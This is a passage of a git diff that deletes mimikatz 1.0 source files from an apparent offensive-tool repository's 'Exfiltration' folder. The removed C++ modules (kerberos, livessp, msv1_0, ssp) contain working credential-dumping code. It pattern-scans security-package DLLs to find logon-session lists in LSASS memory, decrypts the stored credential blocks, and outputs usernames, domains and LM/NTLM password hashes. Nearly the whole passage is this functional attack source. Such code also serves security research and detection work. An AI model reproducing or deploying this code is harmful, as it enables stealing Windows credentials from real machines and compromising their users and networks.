FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier) + offsetMagic, logId))) - { - if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(monBuff); - if(offsetMagic != 0) - pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(reinterpret_cast<PBYTE>(pLogSession) + offsetMagic); - mesCreds = &pLogSession->credentials; - } - } - } - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); - delete [] monBuff; - } - else (*outputStream) << L"n.a. (kerberos KO)"; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h deleted file mode 100644 index 1418d4f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h +++ /dev/null @@ -1,70 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_kerberos { - -private: - typedef struct _KIWI_KERBEROS_LOGON_SESSION - { - struct _KIWI_KERBEROS_LOGON_SESSION *Flink; - struct _KIWI_KERBEROS_LOGON_SESSION *Blink; - DWORD UsageCount; - PVOID unk0; - PVOID unk1; - PVOID unk2; - DWORD unk3; - DWORD unk4; - PVOID unk5; - PVOID unk6; - PVOID unk7; - LUID LocallyUniqueIdentifier; - #ifdef _M_IX86 - DWORD unk8; - #endif - DWORD unk9; - DWORD unk10; - PVOID unk11; - DWORD unk12; - DWORD unk13; - PVOID unk14; - PVOID unk15; - PVOID unk16; - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; - - typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL - { - DWORD unk0; - PVOID unk1; - PVOID unk2; - PVOID unk3; - #ifdef _M_X64 - BYTE unk4[32]; - #elif defined _M_IX86 - BYTE unk4[20]; - #endif - LUID LocallyUniqueIdentifier; - #ifdef _M_X64 - BYTE unk5[44]; - #elif defined _M_IX86 - BYTE unk5[36]; - #endif - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; - - static PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList; - static long offsetMagic; - static PRTL_AVL_TABLE KerbGlobalLogonSessionTable; - static bool searchKerberosFuncs(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModKERBEROS; - static bool getKerberos(vector<wstring> * arguments); - static bool WINAPI getKerberosLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp deleted file mode 100644 index 7f64678..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp +++ /dev/null @@ -1,70 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "livessp.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_livessp::pModLIVESSP = NULL; -mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY mod_mimikatz_sekurlsa_livessp::LiveGlobalLogonSessionList = NULL;//reinterpret_cast<mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY>(NULL); - -bool mod_mimikatz_sekurlsa_livessp::getLiveSSP(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getLiveSSPLogonData, wstring(L"livessp"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_livessp::searchLiveGlobalLogonSessionList() -{ -#ifdef _M_X64 - BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00}; -#elif defined _M_IX86 - BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0}; -#endif - LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions = -(5 + 4); - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModLIVESSP && !LiveGlobalLogonSessionList) - { - - PBYTE *pointeur = reinterpret_cast<PBYTE *>(&LiveGlobalLogonSessionList); - if(HMODULE monModule = LoadLibrary(L"livessp")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"livessp", PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions); - *pointeur += pModLIVESSP->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (pModLIVESSP && LiveGlobalLogonSessionList); -} - -bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchLiveGlobalLogonSessionList()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - BYTE * monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)], * monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)]; - if(PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))) - { - if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(monBuffP); - if(pLogSession->suppCreds) - { - if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) - mesCreds = &(reinterpret_cast<PKIWI_LIVESSP_PRIMARY_CREDENTIAL>(monBuffC)->credentials); - } - else (*outputStream) << L"n.s. (SuppCred KO) / "; - } - } - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); - delete [] monBuffC, monBuffP; - } - else (*outputStream) << L"n.a. (livessp KO)"; - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h deleted file mode 100644 index 891da63..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h +++ /dev/null @@ -1,44 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_livessp { - -private: - typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL - { - DWORD isSupp; // 88h - DWORD unk0; - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; - - typedef struct _KIWI_LIVESSP_LIST_ENTRY - { - struct _KIWI_LIVESSP_LIST_ENTRY *Flink; - struct _KIWI_LIVESSP_LIST_ENTRY *Blink; - PVOID unk0; // 1 - PVOID unk1; // 0FFFFFFFFh - PVOID unk2; // 0FFFFFFFFh - PVOID unk3; // 0 - DWORD unk4; // 0 - DWORD unk5; // 0 - PVOID unk6; // 20007D0h - LUID LocallyUniqueIdentifier; - LSA_UNICODE_STRING UserName; - PVOID unk7; // 2000010Dh - PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; - } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; - - static PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList; - static bool searchLiveGlobalLogonSessionList(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModLIVESSP; - static bool getLiveSSP(vector<wstring> * arguments); - static bool WINAPI getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp deleted file mode 100644 index 39fa015..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp +++ /dev/null @@ -1,217 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0.h" -#include "..\..\global.h" -PLIST_ENTRY mod_mimikatz_sekurlsa_msv1_0::LogonSessionList = NULL; -PULONG mod_mimikatz_sekurlsa_msv1_0::LogonSessionListCount = NULL; - -bool mod_mimikatz_sekurlsa_msv1_0::getMSV(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_msv1_0::searchLogonSessionList() -{ -#ifdef _M_X64 - BYTE PTRN_WIN6_LogonSessionList[] = {0x4C, 0x03, 0xD8, 0x49, 0x8B, 0x03, 0x48, 0x89};//, 0x06, 0x4C, 0x89, 0x5E}; - BYTE PTRN_WIN5_LogonSessionList[] = {0x4C, 0x8B, 0xDF, 0x49, 0xC1, 0xE3, 0x04, 0x48, 0x8B, 0xCB, 0x4C, 0x03, 0xD8}; - - LONG OFFS_WALL_LogonSessionList = -sizeof(long); - LONG OFFS_WN60_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 3 + sizeof(long)); - LONG OFFS_WN61_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long)); - LONG OFFS_WIN5_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 6 + 3 + 8 + 4 + 4 + 2 + 3 + 2 + 2 + sizeof(long)); - LONG OFFS_WIN8_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 3 + 7 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long)); -#elif defined _M_IX86 - BYTE PTRN_WNO8_LogonSessionList[] = {0x89, 0x71, 0x04, 0x89, 0x30, 0x8D, 0x04, 0xBD}; - BYTE PTRN_WIN8_LogonSessionList[] = {0x89, 0x79, 0x04, 0x89, 0x38, 0x8D, 0x04, 0xB5}; - BYTE PTRN_WN51_LogonSessionList[] = {0xFF, 0x50, 0x10, 0x85, 0xC0, 0x0F, 0x84}; - - LONG OFFS_WNO8_LogonSessionList = -(7 + (sizeof(LONG))); - LONG OFFS_WIN8_LogonSessionList = -(6 + 3 + 3 + 2 + 2 + (sizeof(LONG))); - LONG OFFS_WN51_LogonSessionList = sizeof(PTRN_WN51_LogonSessionList) + 4 + 5 + 1 + 6 + 1; - LONG OFFS_WNO8_LogonSessionListCount = OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long)); - LONG OFFS_WIN5_LogonSessionListCount = OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 1 + 3 + 1 + sizeof(long)); - LONG OFFS_WIN8_LogonSessionListCount = OFFS_WIN8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long)); -#endif - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && !LogonSessionList) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offsetListe = 0, offsetCount = 0; -#ifdef _M_X64 - offsetListe = OFFS_WALL_LogonSessionList; - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_LogonSessionList; - taille = sizeof(PTRN_WIN5_LogonSessionList); - offsetCount = OFFS_WIN5_LogonSessionListCount; - } - else - { - pattern = PTRN_WIN6_LogonSessionList; - taille = sizeof(PTRN_WIN6_LogonSessionList); - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - offsetCount = (mod_system::GLOB_Version.dwMinorVersion < 1) ? OFFS_WN60_LogonSessionListCount : OFFS_WN61_LogonSessionListCount; - else - offsetCount = OFFS_WIN8_LogonSessionListCount; - } -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - if((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) - { - pattern = PTRN_WN51_LogonSessionList; - taille = sizeof(PTRN_WN51_LogonSessionList); - offsetListe = OFFS_WN51_LogonSessionList; - } - else - { - pattern = PTRN_WNO8_LogonSessionList; - taille = sizeof(PTRN_WNO8_LogonSessionList); - offsetListe = OFFS_WNO8_LogonSessionList; - offsetCount = (mod_system::GLOB_Version.dwMajorVersion < 6) ? OFFS_WIN5_LogonSessionListCount : OFFS_WNO8_LogonSessionListCount; - } - } - else - { - pattern = PTRN_WIN8_LogonSessionList; - taille = sizeof(PTRN_WIN8_LogonSessionList); - offsetListe = OFFS_WIN8_LogonSessionList; - offsetCount = OFFS_WIN8_LogonSessionListCount; - } -#endif - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), mod_mimikatz_sekurlsa::hLsaSrv, &mesInfos, sizeof(MODULEINFO))) - { - pointeur = reinterpret_cast<PBYTE *>(&LogonSessionList); - if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetListe)) - { - *pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - if(offsetCount) - { - pointeur = reinterpret_cast<PBYTE *>(&LogonSessionListCount); - if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetCount)) - *pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - } - } - } - return (mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && LogonSessionList && (((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) || LogonSessionListCount)); -} - -bool WINAPI mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchLogonSessionList()) - { - LONG offsetToLuid, offsetToCredentials; - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, LocallyUniqueIdentifier); - offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Credentials); - } - else - { - offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, LocallyUniqueIdentifier); - offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Credentials); - if(mod_system::GLOB_Version.dwBuildNumber >= 8000) // pas encore pris le temps de regarder les structures de 8 - { -#ifdef _M_X64 - offsetToCredentials += 4*sizeof(PVOID); -#elif defined _M_IX86 - offsetToCredentials += 2*sizeof(PVOID); -#endif - } - } - - ULONG nbListes = 0; - if(LogonSessionListCount) - mod_memory::readMemory(LogonSessionListCount, &nbListes, sizeof(nbListes), mod_mimikatz_sekurlsa::hLSASS); - else nbListes = 1; - - PLIST_ENTRY pLogSession = NULL; - for(ULONG i = 0; i < nbListes; i++) - { - if(pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LogonSessionList + i), offsetToLuid, logId)) - { - BYTE * kiwiMSVListEntry = new BYTE[offsetToCredentials + sizeof(PVOID)]; - if(mod_memory::readMemory(pLogSession, kiwiMSVListEntry, offsetToCredentials + sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS)) - { - PVOID monPtr = *reinterpret_cast<PVOID *>(kiwiMSVListEntry + offsetToCredentials); - if(monPtr) - { - BYTE * kiwiMSVCredentials = new BYTE[sizeof(KIWI_MSV1_0_CREDENTIALS)]; - if(mod_memory::readMemory(monPtr, kiwiMSVCredentials, sizeof(KIWI_MSV1_0_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) - { - PKIWI_MSV1_0_CREDENTIALS mesCreds = reinterpret_cast<PKIWI_MSV1_0_CREDENTIALS>(kiwiMSVCredentials); - if(mesCreds->PrimaryCredentials) - { - BYTE * kiwiMSVPrimaryCredentials = new BYTE[sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)]; - if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) - { - decryptAndDisplayCredsBlock(&reinterpret_cast<PKIWI_MSV1_0_PRIMARY_CREDENTIALS>(kiwiMSVPrimaryCredentials)->Credentials, justSecurity); - } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"; - delete [] kiwiMSVPrimaryCredentials; - - } else (*outputStream) << L"n.s. (PrimaryCredentials KO)"; - - }else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)"; - delete [] kiwiMSVCredentials; - - } else (*outputStream) << L"n.s. (Credentials KO)"; - - } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)"; - delete [] kiwiMSVListEntry; - - break; - } - } - if(!pLogSession) - (*outputStream) << L"n.t. (LUID KO)"; - } - else (*outputStream) << L"n.a. (msv1_0 KO)"; - return true; -} - -bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity) -{ - if(monBlock->Length > 0 && monBlock->MaximumLength > 0 && monBlock->Buffer) - { - BYTE * monBuffer = new BYTE[monBlock->MaximumLength]; - if(mod_memory::readMemory(monBlock->Buffer, monBuffer, monBlock->MaximumLength, mod_mimikatz_sekurlsa::hLSASS)) - { - mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(monBuffer, monBlock->Length); - PMSV1_0_PRIMARY_CREDENTIAL mesCreds = reinterpret_cast<PMSV1_0_PRIMARY_CREDENTIAL>(monBuffer); - - NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->UserName, false); - NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->LogonDomainName, false); - - wstring lmHash = mod_text::stringOfHex(mesCreds->LmOwfPassword, sizeof(mesCreds->LmOwfPassword)); - wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword)); - - if(justSecurity) - (*outputStream) << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; - else - { - (*outputStream) << endl << - L"\t * Utilisateur : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl << - L"\t * Domaine : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl << - L"\t * Hash LM : " << lmHash << endl << - L"\t * Hash NTLM : " << ntHash; - } - } else (*outputStream) << L"n.e. (Lecture Block Credentials KO)"; - - delete [] monBuffer; - } else (*outputStream) << L"n.s. (Block Credentials KO)"; - - return true; -} - -void mod_mimikatz_sekurlsa_msv1_0::NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ - if(String->Buffer) - String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h deleted file mode 100644 index cf8ccac..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h +++ /dev/null @@ -1,105 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_msv1_0 { - -private: - typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS { - PVOID unk0; // next? - LSA_UNICODE_STRING Primary; - LSA_UNICODE_STRING Credentials; - } KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS; - - typedef struct _KIWI_MSV1_0_CREDENTIALS { - PVOID unk0; // next? - DWORD AuthenticationPackageId; - PVOID PrimaryCredentials; - } KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS; - - typedef struct _KIWI_MSV1_0_LIST_5 { - struct _KIWI_MSV1_0_LIST_5 *Flink; - struct _KIWI_MSV1_0_LIST_5 *Blink; - LUID LocallyUniqueIdentifier; - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING Domaine; - PVOID unk14; // 0 - PVOID unk15; // 0 - PVOID unk16; // offset unk_181A080 - DWORD unk17; // 0Ah - DWORD unk18; // 2 - #ifdef _M_IX86 - DWORD unk19; - #endif - DWORD unk20; // 5AC4186Ch - DWORD unk21; // 1CD6BFDh - LSA_UNICODE_STRING LogonServer; - PKIWI_MSV1_0_CREDENTIALS Credentials; - PVOID unk22; // 0C14h - PVOID unk23; // 0BFCh - } KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5; - - typedef struct _KIWI_MSV1_0_LIST_6 { - struct _KIWI_MSV1_0_LIST_6 *Flink; - struct _KIWI_MSV1_0_LIST_6 *Blink; - PVOID unk0; // unk_18457A0 - DWORD unk1; // 0FFFFFFFFh - DWORD unk2; // 0 - PVOID unk3; // 0 - PVOID unk4; // 0 - PVOID unk5; // 0 - PVOID unk6; // 0C04h - PVOID unk7; // 0 - PVOID unk8; // 0C08h - PVOID unk9; // 0 - PVOID unk10; // 0 - DWORD unk11; // 0 - DWORD unk12; // 0 - PVOID unk13; // offset off_18456A0 - LUID LocallyUniqueIdentifier; - LUID SecondaryLocallyUniqueIdentifier; - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING Domaine; - PVOID unk14; // 0 Windows 8 + 2*PVOID / 4*PVOID!! - PVOID unk15; // 0 - PVOID unk16; // offset unk_181A080 - DWORD unk17; // 0Ah - DWORD unk18; // 2 - #ifdef _M_IX86 - DWORD unk19; - #endif - DWORD unk20; // 5AC4186Ch - DWORD unk21; // 1CD6BFDh - LSA_UNICODE_STRING LogonServer; - PKIWI_MSV1_0_CREDENTIALS Credentials; - PVOID unk22; // 0C14h - PVOID unk23; // 0BFCh - } KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6; - - typedef struct _MSV1_0_PRIMARY_CREDENTIAL { - LSA_UNICODE_STRING LogonDomainName; - LSA_UNICODE_STRING UserName; - BYTE NtOwfPassword[0x10]; - BYTE LmOwfPassword[0x10]; - BOOLEAN NtPasswordPresent; - BOOLEAN LmPasswordPresent; - wchar_t BuffDomaine[MAX_DOMAIN_LEN]; - wchar_t BuffUserName[MAX_USERNAME_LEN]; - } MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; - - static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); - - static PLIST_ENTRY LogonSessionList; - static PULONG LogonSessionListCount; - static bool searchLogonSessionList(); - - static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity); -public: - static bool getMSV(vector<wstring> * arguments); - static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity); -};
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp deleted file mode 100644 index 86dab86..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp +++ /dev/null @@ -1,92 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "ssp.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_ssp::pModMSV = NULL; -mod_mimikatz_sekurlsa_ssp::PKIWI_SSP_CREDENTIAL_LIST_ENTRY mod_mimikatz_sekurlsa_ssp::SspCredentialList = NULL; - -bool mod_mimikatz_sekurlsa_ssp::getSSP(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getSSPLogonData, wstring(L"ssp"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_ssp::searchSSPEntryList() -{ -#ifdef _M_X64 - BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; - LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3; - BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15}; - LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3; -#elif defined _M_IX86 - BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15}; - LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1; -#endif - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModMSV && !SspCredentialList) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - pointeur= reinterpret_cast<PBYTE *>(&SspCredentialList); - -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_SspCredentialList; - taille = sizeof(PTRN_WIN5_SspCredentialList); - offset = OFFS_WIN5_SspCredentialList; - } - else - { - pattern = PTRN_WIN6_SspCredentialList; - taille = sizeof(PTRN_WIN6_SspCredentialList); - offset = OFFS_WIN6_SspCredentialList; - } -#elif defined _M_IX86 - pattern = PTRN_WALL_SspCredentialList; - taille = sizeof(PTRN_WALL_SspCredentialList); - offset = OFFS_WALL_SspCredentialList; -#endif - if(HMODULE monModule = LoadLibrary(L"msv1_0")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"msv1_0", pattern, taille, offset); - *pointeur += pModMSV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (SspCredentialList != NULL); -} - -bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchSSPEntryList()) - { - KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials; - DWORD monNb = 0; - if(mod_memory::readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) - { - while(mesCredentials.Flink != SspCredentialList) - { - 